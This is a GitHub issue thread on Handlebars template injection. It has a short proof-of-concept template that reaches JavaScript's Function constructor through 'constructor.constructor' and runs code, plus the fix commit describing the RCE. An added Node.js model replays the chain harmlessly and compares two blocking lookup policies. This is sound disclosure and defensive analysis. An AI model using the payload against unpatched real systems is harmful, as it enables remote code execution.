
Javascript execution from template #1267

Closed
cryptoad opened this issue Nov 3, 2016 · 3 comments
cryptoad commented Nov 3, 2016

It is possible to execute JavaScript from a template without registering any helper/partial/whatever or having any function in the context. I am not sure if you guys care about this, but it probably is not ideal in the event of a template injection. Anyway, it makes the logicless aspect less logicless.

Here is a sample that would execute whatever is in the initial string (e.g. alert(1)) without anything extra registered:

```handlebars
{{#with 'alert(1)|'}}
{{#with (split '|' 1)}}
{{#> p constructor.constructor}}
{{> (apply 0 ../this)}}
{{/p}}
{{/with}}
{{/with}}
```

I'd venture and say that it could be fixed by making sure that only "own" properties of the helpers/etc dictionaries can be accessed instead of their prototypes' ones as well.

lawnsea (Collaborator) commented Nov 23, 2016

This seems like a bug.

@lawnsea lawnsea added the bug label Nov 23, 2016
nknapp added a commit that referenced this issue Feb 7, 2019
This commit fixes a Remote Code Execution (RCE) reported by
npm-security. Access to non-enumerable "constructor" properties
is now prohibited by the compiled template code, because this is
the first step on the way to creating and executing arbitrary
JavaScript code.
The vulnerability affects systems where an attacker is allowed to
inject templates into the Handlebars setup.
Further details of the attack may be disclosed by npm-security.

Closes #1267
Closes #1495
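The prototype walk performed by the template in this issue, and the two lookup policies discussed in the thread (cryptoad's "own properties only" suggestion, and the ban on non-enumerable "constructor" properties described in the commit message), modelled in plain Node.js. This is an added example, not Handlebars' own code: the names `naiveLookup`, `escalate`, `ownOnlyLookup`, `noConstructorLookup`, `inheritedMethodVisible` and `demo` are invented for the illustration, the payload returns a marker string instead of calling `alert(1)`, and no Handlebars runtime is involved.

```javascript
// Added example (not Handlebars code): models the prototype walk performed by
// the template in this issue and two candidate lookup policies that break it.
// All names here (naiveLookup, escalate, ownOnlyLookup, noConstructorLookup,
// inheritedMethodVisible, demo) are invented for the illustration.

// Unrestricted property lookup: anything reachable through the prototype
// chain is returned, which is what the vulnerable template relies on.
function naiveLookup(obj, name) {
  return obj == null ? undefined : obj[name];
}

// Replays the template step by step against a pluggable lookup policy.
// Returns the function the chain would build, or null if a step is blocked.
function escalate(lookup, payload) {
  // {{#with 'payload|'}} -> the context is now a plain string.
  const ctx = payload + '|';

  // {{#with (split '|' 1)}} -> 'split' is not a registered helper, so it is
  // resolved on the context; naive lookup finds String.prototype.split.
  const split = lookup(ctx, 'split');
  if (typeof split !== 'function') return null;
  const arr = split.call(ctx, '|', 1); // ['payload']

  // {{#> p constructor.constructor}} -> Array -> Function.
  const ctor = lookup(lookup(arr, 'constructor'), 'constructor');
  if (typeof ctor !== 'function') return null;

  // {{> (apply 0 ../this)}} -> Function.apply(0, ['payload']), i.e.
  // Function('payload'): text from the template has become code.
  const apply = lookup(ctor, 'apply');
  if (typeof apply !== 'function') return null;
  return apply.call(ctor, 0, arr);
}

// Policy A (the reporter's suggestion): only "own" properties of the context
// are visible; everything inherited from a prototype is invisible.
function ownOnlyLookup(obj, name) {
  if (obj == null) return undefined;
  return Object.prototype.hasOwnProperty.call(obj, name) ? obj[name] : undefined;
}

// Policy B (what the fix commit describes): a "constructor" property is only
// returned when it is enumerable, which rules out the built-in one every
// object inherits. Other inherited properties stay reachable.
function noConstructorLookup(obj, name) {
  if (obj == null) return undefined;
  if (name === 'constructor' &&
      !Object.prototype.propertyIsEnumerable.call(obj, name)) {
    return undefined;
  }
  return obj[name];
}

// Shows the trade-off between the policies: does a harmless inherited method
// such as String.prototype.split still resolve on a string context?
function inheritedMethodVisible(lookup) {
  return typeof lookup('a|b', 'split') === 'function';
}

// Runs the chain with a harmless payload instead of alert(1): the compiled
// function returns a marker string if it was ever created.
function demo(lookup) {
  const fn = escalate(lookup, 'return "pwned"');
  return typeof fn === 'function' ? fn() : 'blocked';
}

console.log(demo(naiveLookup));         // pwned
console.log(demo(ownOnlyLookup));       // blocked
console.log(demo(noConstructorLookup)); // blocked
```

Policy B is the narrower change and is the one the commit message describes; Policy A is stricter but, as `inheritedMethodVisible` shows, also hides harmless inherited methods. The model stops at building the function: the template's last step additionally relies on Handlebars treating a function-valued dynamic partial as a compiled template and invoking it. Later Handlebars releases went further than Policy B and made inherited property access opt-in at compile time (the `allowProtoPropertiesByDefault` / `allowProtoMethodsByDefault` options, which are not discussed on this page).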
nknapp closed this as completed in edc6220 Feb 17, 2019
hady2 commented Feb 18, 2019

Merged #1501 into 4.x.

nknapp (Collaborator) commented Feb 19, 2019

@hady2 I don't understand your comment. Could you explain?
